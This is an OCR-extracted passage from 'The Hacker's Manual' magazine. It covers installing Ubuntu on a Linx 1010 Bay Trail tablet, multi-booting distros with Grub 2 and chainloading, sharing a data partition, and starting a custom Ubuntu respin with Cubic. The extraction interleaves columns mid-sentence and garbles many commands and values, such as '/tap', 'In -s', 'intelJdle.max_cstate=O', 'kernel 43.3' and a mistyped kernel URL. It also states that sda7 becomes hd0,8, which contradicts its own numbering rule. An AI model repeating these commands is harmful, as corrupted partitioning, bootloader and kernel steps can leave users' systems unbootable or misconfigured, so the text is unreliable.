traditional BIOS, so they won't recognise the USB drive when Unofficial 'official' quasi Ubuntu 14.04.3 LTS release. This
you boot. Second, while hardware support is rapidly comes with 32-bit UEFI support baked in to the ISO. and
improving with the latest kernel releases, it's still not includes custom-built drivers for key components including
particularly comprehensive out of the box. But don't worry - the Z3735F processor and the internal Wi-Fi adaptor.
if you're willing to live with reduced functionality for now However, there's no touchscreen support, so you'll need to
(things are improving on an almost daily basis) you can still connect the tablet to a detachable keyboard and touchpad.
get Linux installed and running in a usable setup using a Bay Go to www.linuxium.com.au on your main PC and check
Trail-based tablet. Here's what you need to do. out the relevant post (dated 12 August 2015, but last updated
It pays to take a full backup of your tablet in its current in December) under Latest. Click the 'Google Drive' link and
state, so you can restore it to its original settings if necessary. select the blue 'Download' link to save Ubuntu-14.04.3-
The best tool for the job by far is a free Windows application desktop-linuxium.iso file to your Downloads folder.
Ian Morrison has
done a lot of hard called Macrium Reflect Free (www.macrium.com/ Once done, pop in a freshly formatted USB flash drive -
work building a reflectfree.aspx). Install this on your tablet, then back up the it needs to be 2GB or larger and formatted using FAT32.
version of Ubuntu entire disk to your tablet's microSD storage before creating a The simplest way to produce the disk is to use UNetbootin
14.04.3 ITS for
failsafe Macrium USB bootable drive for restoring the backup and select your flash drive, browse for the Ubuntu ISO and
Z3735f-powered
if required. Note: The microSD slot can’t be detected by the create the USB drive. Once written, eject the drive. Plug it into
devices like the
Linx 1010. If you'd rescue disc, so to restore your tablet to its default state you'll one of the Linx's USB ports, then power it up by holding the
like him to develop need a USB microSD card reader, which can be detected by power and volume + buttons together. After about five
his work further the Macrium software. seconds or so you should see confirmation that boot menu is
- we recommend
With your failsafe in place, it's time to play. While they’re about to appear - when it does, use your finger to tap 'Boot
donating through
his website www. very similar, Bay Trail tablets aren’t identical, so it’s worth Manager'. Use the cursor key to select the 'EFI USB Device'
Iinuxlum.com.au. searching for your tablet model and a combination of relevant entry and hit Return to access the Grub menu. Next, select
terms ('Linux', 'Ubuntu' and 'Debian' etc) to see what turns up. 'Try Ubuntu without installing’ and hit Return again.

104 | The Hacker's Manual


Ubuntu tablet

Hardware support
What's the current state of play for hardware » Bluetooth This often needs patching with
support for Bay Trail tablets? It varies from later kernels, although our Linx tablet retained
device to device, of course, but there are Bluetooth connectivity throughout, even when
differences. Here’s what you should be looking the internal Wi-Fi adaptor stopped working.
for when testing your tablet: » Sound A problem on many tablets, and even
» ACPI This deals with power management. if the driver is recognised and loaded, required
This is practically non-existent out of the box, firmware may be missing. Be wary here - there
but later kernels do tend to produce support for are reports of users damaging their sound cards
displaying battery status - the Linx appears to while trying to activate them.
be :he exception to the rule here. Suspend and » Touchscreen As we've seen, older kernels
hibernation should be avoided. don't support them, but upgrading to kernel 4.1
» Wi-Fi Later kernels again improve support, or later should yield positive results, albeit with a
but many devices use SDIO wireless adaptors, bit of tweaking.
which aren't supported without patches or » Camera There's been little progress made
custom-built drivers like those found at here so far. In most cases you'll need to wait for > Upgrade the kernel to 4.1 or later to make
https://github.com/hadess/rtl8723bs drivers to appear. Ubuntu touch-friendly on your tablet.

You'll see the Ubuntu loading screen appear and then after We recommend ticking 'Download updates while installing'
a lengthy pause (and blank screen) the desktop should before clicking 'Continue', at which point you’ll probably see
appear. You should also get a momentary notification that the an Input/output error about fsyncing/closing - simply click
internal Wi-Fi adaptor has been detected - one of the key 'Ignore' and then click 'Yes' when prompted to unmount
While it may
indications that this remixed Ubuntu distro has been tailored various partitions. be tempting to
for Bay Trail devices. At the partition screen you'll see what appears to be upgrade the kernel
Up until now you’ll have been interacting with your tablet excellent news - Ubuntu is offering to install itself alongside all the way to the
current release
in portrait mode - it's time to switch it to a more comfortable Windows, but this won't work, largely because it'll attempt to
(4.4.1 at time of
landscape view, and that's done by click the 'Settings' button install itself to your microSD card rather than the internal writing) you may
in the top right-hand corner of the screen and choosing storage. This card can't be detected at boot up, so the install run into issues with
System Settings. Select 'Displays', set the Rotation drop-down will ultimately fail. Instead, we're going to install Ubuntu in your touchpad.
menu to 'Clockwise' and click 'Apply' (the button itself is place of Windows, so select 'Something else’. For now, stick to
kernel 43.3 until
largely off-screen, but you can just make out its left-hand end Ignore any warning about /dev/sda - focus instead on
these problems are
at the top of the screen as you look at it). /dev/mmcblkO, which is the internal f ash storage. You'll see ironed out.
Next, connect to your Wi-Fi network by clicking the four partitions - we need to preserve the first two (Windows
wireless button in the menu bar. selecting your network and Boot Manager and unknown) and delete the two NTFS
entering the passkey. You're now ready to double-click Install partitions (/dev/mmcblk0p3 and /dev/mmcblk0p4
Ubuntu 14.04.3’ and follow the familiar wizard to install respectively). Select each one in turn and click the'-’ button
Ubuntu on to your tablet. You'll note that the installer claims to delete them.
the tablet isn't plugged into a power source even though you Next, select the free space that's been created (31,145MB
should have done so for the purposes of installing it - this is a or thereabouts) and click the'+' button. First, create the main
symptom of Linux's poor ACPI support for these tablets. partition - reduce the allocation by 2,048MB to leave space

> You can create your


Ubuntu installation media
from the desktop using
the UNetbootin utility - it's
quick and (in this case)
works effectively.

The Hacker's Manual | 105


Hacking

6 A install dsdt respectively. Both improve the hardware support for


a devices sporting the Linx 1010's Z3735F Atom chip, and while
ll Ubunt Installation type
M.3LTS
they don't appear to add any extra functionality to the Linx,
they do ensure the processor is correctly identified.
You need to chmod both scripts following the same
procedure as outlined in step 2 of the Grub step-by-step
guide (see bottom right), then install them one after the other,
rebooting between each. Finally, download and install the
latest Ubuntu updates when offered.
You'll notice the login screen reverts to portrait mode
when you first log in - don't worry, landscape view is restored
after you log in. and you can now review what is and isn't
Quit Back install Now supported on your tablet. In the case of the Linx 1010, not an
awful lot is working at this point. There's no ACPI support, the
touchscreen isn’t detected, and there's no camera support or
sound (although the sound chip is at least detected). The
> Make sure for the swap partition, and set the mount point to '/', but internal Wi-Fi is thankfully supported, as are the USB ports.
you manually leave all other options as they are before clicking 'OK'. Now Bluetooth, keyboard/trackpad and internal flash.
set up your select the remaining free space and click'+’ for a second Later versions of the kernel should improve compatibility
partitions when
time. This time, set 'Use as' to 'swap area' and click 'OK'. - this is why we were keen to see if we could install Ubuntu
prompted - you
Finally, click the 'Device for bootloader installation' dropdown 15.10 or 16.04 on the Linx. We were thwarted in this respect -
need to preserve
menu and select the Windows Boot Manager partition before touch support is present, but we had to manually add the
the original
EFI partition. clicking 'Install Now’. The rest of the installation process bootia32.efi file to the EFIXBoot folder to get the live
should proceed smoothly. Once it's finished, however, don't environment to boot, and installation failed at varying points,
click 'Continue testing or Reboot now just yet. First, there’s a probably due to the spotty internal flash drive support. We're
vital step you need to perform in order to make your copy of hoping the final release of 16.04 may yield more possibilities,
Ubuntu bootable, and that’s install a 32-bit version of the but if you can’t wait for that and are willing to run the risk of
Grub 2 bootloader. The step-by-step walkthrough (see reduced stability read on.
bottom right) reveals the simplest way to do this, courtesy of If you're desperate to get touchscreen support for your
Ian Morrison's handy script. tablet, and you’ve got a spare USB Wi-Fi adaptor handy
(because updating the kernel breaks the internal Wi-Fi
Hardware compatibility adaptor), then upgrade your kernel to 4.1 or later. We picked
Once you’ve installed Ubuntu and rebooted into it for the first kernel 4.3.3 - to install this, type the following into a Terminal:
time, you'll once again need to set the desktop orientation to $ cd /tap
landscape via Screen Display under System Settings. Now $ wget \kernel.ubuntu.com/~kernel-ppa/mainline/v4.3.3-wily/
open Firefox on your tablet and download two more scripts linux-headers-4.3.3-040303_4.3.3-040303.201512150130_all.
from http://bit.ly/z3735fpatch and http://bit.ly/z3735f- deb

Experimenting with Linux


The only other distro we were able to install successfully
on the Linx 1010 tablet was Debian Jessie (8.3). It's unique
in that both 32-bit and 64-bit versions work with 32-bit
UEFI without any modification, but there's no live support:
you'll have to install it direct to the hard drive.
Wi-Fi support isn't provided out of the box - we had to
add a non-free firmware package to the USB flash drive to
get our plug-in card recognised. Hardware support was
minimal, although upgrading to kernel 4.2 did at least
allow the internal Wi-Fi adaptor to be recognised.
Elsewhere we tried the Fedlet remix of Fedora
(http://brt.ly/fedora-fedlet) as a live USB, but had to
use a Windows tool (Rufus) to create the USB flash drive
in order for it to boot. Performance was extremely
sluggish, and the internal Wi-Fi adaptor wasn’t recognised.
Touch did work, however.
We also had success booting from a specialised Arch
Linux ISO that had SDIO Wi-Fi and 32-bit UEFI support.
You can get this from http:ZTbit.ly/arch-baytrail. but
stopped short of installing it. We also got a version of
Porteus up and running from http://build.porteus.org
with a lot of fiddling, but the effort involved yielded no > Setting the issues with the Wi-Fi adaptor aside, installing Debian was a
better results than anything else we tried. reasonably straightforward process on our Linx 1010 tablet.

106 | The Hacker's Manual


Ubuntu tablet

$ wget kernel.ubuntu.eom/~kernel-ppa/mainline/v4.3.3-wily/ xinput set-prop “Goodix Capacitive TouchScreen”


linux-headers-4.3.3-040303-gener ‘Coordinate Transformation Matrix’ 010-101001
ic_4.3.3-040303.201512150130_amd64.deb You should now find the touchscreen works correctly in
$ wget \kernel.ubuntu.com/~kernel-ppa/mainline/v4.3.3-wily/ horizontal landscape mode. As things stand, you'll need to Open Settings >
linux-image-4.3.3-040303-gener apply this manually every time you log into Ubuntu, while the Universal Access
ic_4.3.3-040303.201512150130J386.deb touchscreen won't work properly if you rotate back to portrait > Typing tab and
flick the'On Screen
$ sudo dpkg -i linux-headers-4.3*.deb linux-image-4.3*.deb mode. If you want to be able to rotate the screen and
Keyboard'switch to
Once complete, reboot your tablet. You'll discover you now touchscreen together, then adapt the rotate-screen.sh script On to have it start
have touch support at the login screen (this is single touch, at http://bit.ly/RotateScreen (switch to Raw view, then automatically with
not multi-touch), but once you log in and the display rotates right-click and choose ‘Save page as' to save it to your tablet). Ubuntu.Next,open
Onboard Settings
you’ll find it no longer works correctly. We'll fix that shortly. Then open it in Gedit or nano to amend the following lines:
via the dash and
First, you need to be aware of the drawbacks. You'll lose TOUCHPAD-pointer:SINO WEALTH USB Composite tick'Start Onboard
support for the internal SDIO wireless card (we had to plug in Device’ Hidden; plus tweak
a spare USB Wi-Fi adaptor to get internet connectivity back) TOUCHSCREEN- Goodix Capacitive TouchScreen’ the keyboard to
and the sound is no longer recognised. There may also be Save and exit, then use the script: your tastes. Now
you'll have easy
issues with stability that you can fix with a rough and ready $ ,/rotate_desktop.sh <option>
access to the touch
workaround by configuring Grub: Substitute <option> with normal (portrait), inverted, left keyboard via the
$ sudo nano /etc/default/grub or right to rotate both the screen and touchscreen matrix. status menu.
Look for the line marked GRUB_CMDLINE_LINUX_ Before using the script, you need to first undo the current
DEFAULT and change it to this: screen rotation using Screen Display - restore it to its default
GRUB_CMDLINE_LINUX_DEFAULT="intelJdle.max_ view, then run ,/rotate_desktop.sh right to get touchpad and
cstate=O quiet” touchscreen on the same page.
Save your file, exit nano and then type: From here we suggest creating a startup script:
$ sudo update-grub open dash and type startup , then launch Startup
Reboot, and you'll reduce the potential for system lockups, Applications. Click 'Add'. Type a suitable name etc to help
but note the kernel parameter increases power consumption you identify it, click 'Browse' to locate and your select your
and impact on battery life, which is a shame because the script - when done, click inside the 'Command' box and be
ACPI features still don't work, meaning that the power sure to append right to the end of the script. Click 'Save',
settings remain inaccurate: battery life is always rated at reboot and after logging in you should find your tablet and
100%, even when it's clearly not. touchscreen now work beautifully with your plug-in keyboard
and touchpad.
Fix the touchscreen You've now successfully installed Ubuntu on your Bay Trail
Moving on, let's get the touchscreen working properly. First, tablet. What next? Keep an eye out for the latest kernel
identify its type using xinput. In the case of the Linx 1010, updates and forums to see if entrepreneurial folk have found
this reveals it has a Goodix Capacitive TouchScreen. What we the workarounds and tweaks required to get more of your
need to do is instruct the touchscreen to rotate its matrix tablet’s hardware working properly. As for us, we’re off to see
when the display does, which means it'll work in both portrait if we can get the internal sound and Wi-Fi working again
and landscape modes. You can do this using xinput: before turning our attention to the ACPI settings... ■

Install 32-bit Grub bootloader


>ackaoe grub-eft-tk32-btn.
IS and directories currently installed.)
UJ2 btn_2.!2-betd! 9ubuntul.7_oftd64.dcb ...
!-bvl«2*9vbu(ilul.7) ...
grvb-tfVUJZ.
ta32 2.62-beto2-9ubuntul.7 andM.deb ...
:a2-9vbuntul.7) ...
*2-be:a2-9ubuntul.7) ...

No preview available :/grub with new version


■ eported.

• non-tero valve when C*UO_UIOOCN_TIMCOUT Is set Is no longer suppor

3.16.8-M-4dMfte
Unuxlum-J2btt-p«tch.*h Ing-J.16.6-68 generic
whkhiv shell script (1.9 K6) l.lftfi-dS-genertr .
from: https //doc-iO*4-do<s googlevsercontent com Ing-1.16.6-45-generic
.rnwa-e configuration
what should Firefox do with this fief
Open with gedit (default)
installation Ms f rushed. You can continue letting Ubuntu now, but until you
restart the computer, any changes you make or documents you save will not be
preserved

cononue lestmg | Kestert now ,J

D Download install script 0 Install script 0 Reboot PC


When Ubuntu has finished installing to your The linuxium-32bitpatch.sh file is a script You'll see a series of packages are
tablet, make sure the dialogue asking if you'd that automates the process of installing the downloaded and installed automatically,
like to continue retesting or restart your PC is 32-bit version of the Grub 2 bootloader. Now which will basically allow your tablet’s 32-bit
kept on-screen. Now open the Firefox browser you’ll need to press Ctrl+Alt+T and type the UEFI to recognise the Grub bootloader, and
and navigate to http://bit.ly/grub32bit, following commands: allow Ubuntu to load automatically at startup.
which will redirect to a Google Drive download $ cd Downloads Click the ‘Restart Now' button to complete
page. Click 'Download' to save the linuxium- $ chmod 700 linuxium-32bit-patch.sh the process and wait while your PC reboots
32bit-patch.sh to your Downloads folder. $ sudo ,/linuxium-32bit-patch.sh into Ubuntu proper for the first time.

The Hacker's Manual | 107


Hacking

MULTI-BOOTINGWITH
* GRUB t
Having plenty of choice allows you to be fickle,
so it’s time we show you how to have several
distros on your computer at once.
here are lots of Linux distributions Windows installed on the same computer and also look at how you can share things like your

T (distros) out there, each with their


own strengths and weaknesses.
When you want to try another one
you can usually get hold of a live version, or
choosing between them at boot time, but the
same can be done with two Linux distros.
Over the next few pages we will look at how
you can set up your computer to be able to
documents and photos between the various
distros you are running.

Grub 2 vs Grub legacy


install it in a virtual machine, for a quick boot from a choice of several operating Multi-booting Linux is made easier thanks to
test. Both of these are quick and easy but systems, one of which may be Windows, so the almost universal adoption of Grub2as the
are not the same thing as running an that you can have more than one Linux distro bootloader. There are two main versions of
installed distro directly. available at once. You could even extend the Grub available. The old version, that never
But perhaps you don't want to give up on information we give here to include one or quite reached 1.0, is often known as Grub
your exist ng distro or maybe you share a more of the BSD operating systems too. We'll legacy, while the newer Grub 2 is what is used
computer with your partner and by the vast majority of
you prefer Mint but they like
“Multi-booting Linux is made distros now. Grub 2 is very

I
Fedora - it would be great to have different from the old
both. So what are you to do? The easier thanks to the almost program, giving rise to a
term ‘dual booting' is usually used reputation for complexity. In
to refer to having a Linux distro and universal adoption of Grub 2.” fact, its modular approach

108 | The Hacker's Manual


Multi-booting

still be installed. If you are offered a choice for


Screenshot GParted Screen resolution Web Browser
the swap partition, pick the one from your
other distro, they can both use it.
When the installer has finished, reboot
your computer and you will see the boot menu
from the first distro, with Windows showing, if
appropriate, but no sign of your new distro.
That’s because you have left the Grub settings
untouched. One of the neat features of Grub 2
is its ability to generate its own configuration
files, so open a terminal and run:
$ sudo grub-mkconfig -o /boot/grub/grub.cfg
This will scan your hard drive for an OS and
create menu entries for each of them. Now
reboot and you should see both distros, and
maybe Windows, in your boot menu. Ubuntu
and its derivatives have a command called
update-grub , which is a one line shell script
that runs grub-mkconfig as above, use
tt>u are advised to backup your data before proceeding.
whichever you prefer. One advantage of not
X cancel | apply |
using the script is that you can preview the
menu with $ sudo grub-mkconfig I less to
/dev/zda ■ GParted see what would be picked up and written to
the menu. You need to understand 'Grubese'
> GParted is the easiest way to manage your partitions, making room for another distro.
to make sense of this.
means it can handle many more booting setup, if you already have it you can skip the
situation and is able to automatically preceding paragraph and go straight onto the Moving Grub
configure itself much of the time. We will only interesting part of adding extra Linux distros If your new installation didn't offer an option to
consider Grub 2 from here on, and simply to your setup. relocate Grub, you will probably get a boot
refer to it as Grub. menu with everything already in it, because it
There are three main parts to Grub. The Adding another distro ran grub-mkconfig as part of the process.
initial boot code is normally loaded into the Distro installers can repartition your drive with So why not let this happen every time? The
Master Boot Record (MBR) of the disk. This is varying degrees of success, so it's often best problem is with updates, when a distros
a small space, 446 bytes, so this code is to prepare your drive beforehand. The best package manager installs an update to the
minimal and just enough to load the second tool for this is GParted and, download the Linux kernel, it will re-enable that distros
part, which lives in your boot directory or latest release from its home at http:// version of Grub, so you'll find the menu
partition in a directory called grub. In here you gparted.org. Boot into GParted Live and switching from one distro to the other.
will find the various filesystem modules, along resize your existing root partition to a suitable To relocate Grub to a distros partition, first
with themes and fonts used if your distro has size. GParted will tell you how far you can go. boot into the distro you want to manage Grub
customised the boot menu’s appearance. but if possible make it at least 50% larger than and make sure it’s doing so with this terminal
You will also find the most important file for the space it currently needs. Don't create a command (assuming you are using the disk at
the purposes of this article: grub.cfg. This file partition in the space that's freed up. leave it /dev/sda): $ grub-install /dev/sda.
contains the menu definitions, which options unallocated then install your second distro in Then boot into the other distro and identify
appear in the boot menu and what happens the usual way, telling it to use the unallocated the partition holding your root filesystem with
when you select each one. space on the drive. The installation is done in $ findmnt / -o SOURCE , then tell Grub to
The first step is to get some operating the normal way with one exception, you don’t keep its bootloader there with $ grub-install
systems installed. If you want to include want to install Grub to the MBR. Most -force /dev/sdaN where sdaN is the device
Windows in your list of OSes, it should be installers have an option to choose the returned by findmnt. We need -force
installed first, which isn't usually an issue location for Grub, it may be hidden behind an
since it was probably on the computer already. Advanced Button. If this isn't possible, we will
Linux installers are good at identifying an show you how to move it later. Choose either
existing installation of Windows and working to install it to the root partition of the distro or
with it. Then install your preferred distro as not at all. This only affects the first part of the
normal. This will give you a standard dual boot Grub code, the files in boot and elsewhere will

One distro in control


The first distro you install should be considered unbootable - at least until you boot from a
your primary distro; this is the one that rescue disc to fix things. Other distros can be
controls booting, at least for now. Because of removed later with no more inconvenience with
that, you should never remove the primary a superfluous boot menu entry that goes > Some distros allow you to keep Grub out
distro or you could render your computer nowhere (until you run update-grub again). of the MBR when you install them, but they
may try to tell you this isn’t a good idea!

The Hacker's Manual | 109


Hacking
» because installing Grub to a partition is default (Grub counts from zero so the linux creates menu entries for the running
considered less than ideal these days, but all standard setting boots the first item). You can distro while 30_os-prober scans your hard
we really want to do here is keep it out of the also change the timeout with the line GRUB_ disk for other operating systems, Linux or
way. This means that when a kernel update TIMEOUT and the default kernel options in otherwise, and adds them to the menu.
appears forthat distro, your boot menu won't GRUBJJNUXDEFAULT . The file is The last one is the way one menu can contain
get messed up. In fact, it won't be touched at commented, explaining the options, or you all of your distros.
all. so you will need to boot into your primary can read the Grub info page for a more
distro and run grub-mkconfig or update-grub detailed listing of all the options. Chainloading
again to pick up the changes. The files in /etc/grub.d are shell scripts There is another way of handling multiple
that are run by grub-mkconfig . If you want to distros called ‘chainloading'. This is how Grub
Configuring Grub customise your boot menu, you can add your boots Windows because it can't boot Windows
Grub's ability to generate its own menu based own scripts, all they need to do is output valid itself. Instead, it passes control to the Windows
on the contents of your hard drive is one of its menu entries. The scripts in /etc/grub.d are bootloader, as if that had been loaded directly
killer features, but you can also configure how run in order, which is why their names start by the BIOS. We can use this to enable each
these menus are created. This uses the scripts with numbers. OO_header writes the standard distro to maintain its own boot menu and
in /etc/grub.d and the settings in /etc/ settings at the top of the menu file, while 1O_ choose one from the initial Grub menu.
default/grub. This file contains a number of That means you
variable definitions which you can change to need a way to create
alter the menu, eg Grub normally boots the
“Use chainloading to enable your own menu
first option if you do not select anything, find
the line that sets GRUBJDEFAULT=O and
change it to the number you want to be

GNU GRUB
I each distro to maintain its
own boot menu.”
version 2.02~beta2-%buntul.3
entries. You can't
simply add them to the
grub.cfgfile as that
will be overwritten the
next time grub-mkconfig is run, but there is a
file in /etc/grub.d called 40_custom that you
can use to add your own menu entries. Copy
this to a meaningful name, and possible
Advanced options for Linux Mint 17.3 Cinnamon 64-bit
change the number to include it earlier in the
Chainload openSUSE 42.1 menu. Edit this file and add valid menu entries
Chainload Manjaro 15.12
Chainload Fedora 23 to the bottom of this file. Don't touch the
existing content - although you can and
Memory test (memtest86+)
Memory test (memtest86+, serial console 115200) should read it. If you want to load the menu for
Windows 7 (loader) (on /dev/sdal)
openSUSE 42.1 (x86_64) (on /dev/sda7) OpenSUSE installed on /dev/sda7, provided
Advanced options for openSUSE 42.1 (x86_64) (on /dev/sda7) you installed Grub to sda7 or moved it as
Manjaro Linux (15.12) (on /dev/sdaS)
Advanced options for Manjaro Linux (15.12) (on /dev/sda8) above, add this to the file:
Fedora 23 (x86_64) (on /dev/sda9) menuentry “Load openSUSE boot menu” {
Advanced options for Fedora 23 (x86_64) (on /dev/sda9)
set root=(hd0,7)
System Rescue Cd 4.7.0
chainloader +1
}
Remember, Grub numbers disks from zero
but partitions from one, so sda7 becomes
hd0,8. This gives you the original boot menu

Use the T and I keys to select which entry is highlighted.


for each distro, and you don't need to reboot
Press enter to boot the selected OS, 'e' to edit the commands before booting or 'c' into the primary distro to update the boot
for a command-line.
The highlighted entry will be executed automatically in S89s.
menu, but it does mean that you have to make
two menu selections to boot any distro but
the main one. If you are using this method,
> Here we are, four distros, Windows and an option to boot from a rescue CD ISO image - you will see that you still have menu entries
all on the one boot menu with choices to visit the other distros’ individual boot menus. generated by grub-mkconfig . If you are not

Rescue systems
One of the neat features of Grub 2 is that it can custom and add the appropriate menu set root='(hdO,l)’
boot directly from an ISO image. Apart from definition. Here’s an example for System Rescue isofile=/Ubuntu/ubuntu-15.10-desktop-amd64.
allowing magazines to produce really nice multi­ CD (I always keep an ISO of that in boot): iso
boot cover discs, it also means you can have a set root='(hdO,l)’ loopback ioop $isofile
rescue or live CD always ready to boot. Not only menuentry “System Rescue CD 4.7.0” { menuentry “Ubuntu 15.10” {
is it faster than booting from an actual CD/DVD loopback loop /systemrescuecd-x86-4.7.0.iso linux (loop)/casper/vmlinu2.efi file=/
(or even a USB stick) but it saves all the time linux (loop)/isolinux/altker64 cdrom/preseed/ubuntu.seed boot=casper iso-
scrabbling though the stuff on your desk to find rootpass=something setkmap=uk scan/filename=$isofile quiet splash —
the right CD. isoloop=systemrescuecd-x86-4.7.0.iso initrd (loop)/casper/initrd.lz
This requires that the distro supports booting initrd iloop)/isolinux/initram.igz }
from an ISO. Most do. although the syntax can } Note the use of a variable, isofile , both
vary. All you need to do is create a copy of 4O_ and here is one for an Ubuntu live CD image methods work but this one is easier to maintain.

110 | The Hacker's Manual


Multi-booting
using Windows, you can prevent these menu
entries by using the following setting in /etc/
default/grub:
GRUB_DISABLE_OS_PROBER=true
As the os-prober function also adds
Windows, you cannot do this if you want to be
able to boot Windows, so either rename the
file containing the chainloader entries to have
those entries appear before the others,
something like 20_chainload or copy the
windows entry from your existing grub.cfg to
your chainload file then disable os-prober.

Sharing space
So we have several distros that are co-existing
in harmony, but what about our data? Do we
really need a separate home directory for
each distro? The short answer to that is yes.
While we could have a separate filesystem for You may find your installer allows you to use less than all of the available space for your
home and share the same user name and installation, saving the trouble of resizing in GParted later on.
home directory, this is likely to cause conflicts. To do this we need to go back to GParted and so on. Now when you save a file in
Programs store their configuration files in your and resize your partitions to make space to Documents, it will actually go to /mnt/
home directory, and if two of your distros have create a large partition for your data. Then common/Documents and be available to all
different versions of the same program you edit /etc/fstab on each distro to mount this your distros. Note: This assumes you are the
could have problems. Most software will filesystem at boot time. Incidentally, it is only user of the computer.
happily read the settings from an older version worth adding fstab entries to mount your
and update them, but then when you switch other distros in each one, say at Who owns what?
back to the distro with the older version, it /mnt/distroname - it makes things like this Now we have to tackle the thorny issue of file
could break. easier as you can do all the work in one distro. permissions and ownership. The first thing to
One solution is to have a separate It also makes accessing files from other do is make sure that the directories in
filesystem for your data files, these are what distros simple. So have this new filesystem /mnt/common have the correct owners with:
take up the space and are the files that you mount at. say, /mnt/common and create a $ sudo chown -R username: /mnt/common/
want available to all distros. This can be an directory in it for each user. Then you can user
entirely separate filesystem, but it could also create symbolic links to here in your other You may expect this to work for all your
be your home directory in your primary distro, distros, for example: distros if you created a user with the same
just remember that in this case you will have a $ In -s /mnt/common/user/Documents /home/ name in each of them, but it may not. This is
lot of file shuffling to do before you can user/Documents because Linux filesystems don't care about
consider deleting that distro should it fall out $ In -s /mnt/common/user/Music /home/user/ usernames but rather those users' numerical
of favour with you. Music user IDs (UIDs). Most distros give the first user
a UID of 1000, but a couple still start at 500,
*fstab (/etc) - gedit _ + x so check your UID in each distro with the id
File Edit View Search Tools Documents Help command, just run it in a terminal with no
£! Open ▼ □= Save @ r* Undo ' iD 6 Q, arguments. If they all match then great,
otherwise you will need to change any non­
1.-1 *fscab *
matching UIDs by editing /etc/passwd. Never
# Use 'blkid1 to print the universally unique identifier for a edit this file directly, a mistake could prevent
# device; this may be used with UUID= as a more robust way to name devices
anyone logging in, use the vipwcommand
# that works even if disks are added and removed. See fstab(5).
# instead $ sudo vipw.
# <file system> <mount point> <type> <options> <dump> <pass> Find the line for your user, which will look
# I was on /dev/sda5 during installation something like this
UUID=5743aec8-5642-4fbe-8a0f-c547218372db / ext4 user:x:500:100::/home/user:/bin/bash
errors=remount-ro 0 1
The first number is the UID. Change it to
# swap was on /dev/sda6 during installation
UUID=be7af5ae-c75f-457f-b22a-b7ddf9e00554 none Swap match the other distros and save the file. Next,
sw 0 0 need to change all files owned by the old UID
/dev/fd0 /media/floppyO auto rw,user,noauto,exec,utf8 0 0 to the new one. As everything in your home
directory should be owned by you, you can
/dev/sdab /mnt/common ext4 noatime 0 0
/dev/sda7 /mnt/opensuse ext4 noatime 0 0
take the brute force approach and chown
/dev/sda8 /mnt/manjaro ext4 noatime 0 0 everything in there
/dev/sda9 ZmntZfedora ext4 noatime 0 0 $cd
/dev/sdal ZmntZwindows ntfs defaults) 0 0 $ sudo chown -R username:.
Now you can switch between distros any
Plain Tert ▼ Tab Width: 8 T tn 18. Col 49 INS
r *»)) 0 12:13 Q1|
time you reboot, with each distro running
Menu M 0Terminal fpfstab (/etc)-gedit 1 /
natively and at full speed, and all with access
> For easier management add entries to /etc/fstab to mount your distros* root partitions. to all of your data. ■

The Hacker's Manual | 111


Hacking

How to build your


very own custom
Ubuntu distro
Why settle for what the existing distributions have to offer? Michael Reed
looks at Cubic, a tool for creating your own custom respin based on Ubuntu.

art of the beauty of Linux is the freedom of

P deployment that distributions offer, but when


installing it for yourself or others you’ll want to change
things. So, why not make your own version, or 'respin'? That’s
what a tool called Cubic is for, and we're going to look at how
file Edit View Bookmarks Go Tools Help

» C * O O

Places

■ D«
|/home/mike

you use it to modify the standard Ubuntu installation ISO and ClRut
bend it to your will in terms of content and aesthetics. 1 Documents

As for the difficulty? If you can install packages J Music


J Pictures
from the command line and boot from an ISO in a virtual J. Videos
Michael Reed
has been respinning machine, you should find it easy to get started with Cubic | Downloads

Linux for so long as the defaults were always usable in our experience. We’ll
that he spins it like a start with the simplest example of
record, right 'ound,
just adding some new packages and rebuilding the
baby. Right round,
ISO. This modified ISO can be used as an installer or
round, round.
as a live desktop environment. > We added the LXDE desktop to a standard Ubuntu
Once that's working, we'll show you how to customise it installation ISO. We also added a custom default
further by making LXDE the default desktop environment, backdrop for all new users.
customising that environment and adding some PPAs so privileges, unlike some tools of this sort.
that it really does feel like The first page of the Cubic user interface enables you
its your own personal spin on how Linux should look to specify the project directory. Cubic doesn’t run any tests
and work. for free space itself, and you'll need quite a lot of space for
the uncompressed ISO. The Ubuntu Desktop installation
Install Cubic ISO may weigh in at around 2.7GB, but its actual content is
Cubic expects to run under Ubuntu or Linux Mint about double that as it’s compressed using Squashfs. We’d
or one of their derivatives. If you are running a different recommend having at least 20GB free before you begin
distribution, you can still use Cubic and follow this tutorial using Cubic.
by running Ubuntu in a VM. Begin by installing from PPA. To The decompressing and recompressing of an ISO is
do this, locate the Cubic page on Launchpad (https:// rather time-consuming and an SSD works faster than
When you modify launchpad.net/cubic) and follow the instructions by a mechanical hard drive for this task. One way of speeding
an Ubuntu cutting and pasting the needed commands from that page, things up is to leave the project directory intact between
distribution that
sudo apt-add-repository ppa:cubic-wizard/release different build attempts.
makes use of a live
CD environment,
adds the repository to your system, sudo apt update This way. the decompression stage of the process only
using Cubic you're updates the system so that it can see contents of the Cubic has to be carried out once, and you keep the changes
also modifying the PPA. sudo apt install -no-install-recommends cubic mn you've already made. Delete the folder and start again if you
live environment. adds Cubic itself. Other than that, the installation should want a true fresh start at modifying
This means that
then take care of itself in terms the ISO.
Cubic is perfect for
making a bootable of dependencies. Having specified the working directory for the project,
ISO with some extra The next step is to obtain an up-to-date Ubuntu press Next to proceed to the next page, the Project page.
tools on it. All you installation ISO to work with. We’ll use Ubuntu 21.04, Click the icon next to the filename field and specify the
need to do is select
but 20.04 LTS (Long Term Service) is a good choice as well. base ISO that you plan to use as your starting point for
Try Ubuntu when it
Launch Cubic in the normal way that you launch GUI apps customisations. Once you’ve done that, most of the fields
startsup.
or load it in a terminal window for extra progress on this page will be filled in automatically, but you can safely
information. When running, Cubic requires no super-user change things like
Build your own custom Ubuntu distro

the release name and the name of the output ISO.


Click next to move on to the Extract page. You don't have
to do anything on this page, but be warned that it might be
There are a lot of
a good time for a quick tea break, as extraction can take a
Linux utilities for
few minutes. Once this is complete, you can open the same remixing an existing
directory again in the future. Once you've extracted the files distribution floating
from the ISO. you can quit the application at any time as about, but we found
long as you don't interrupt an operation that is in process, that most of them
aren't maintained!
and this means that you don't have to complete the
This means that
customisation in a single session with the program. they only work
properly with
The Terminal page distributions that
are now out of date.
Without doing anything else, you'll be moved onto the next
Even if they seem
page, the Terminal page, and this is where we'll be spending to work, chances
a lot of our time. Cubic employs some Linux wizardry (a are they'll fall over
chroot terminal) to give you a virtual terminal that operates halfway through the
on the filesystem that will process or
> Our idea of an appropriate Linux startup screen. what they produce
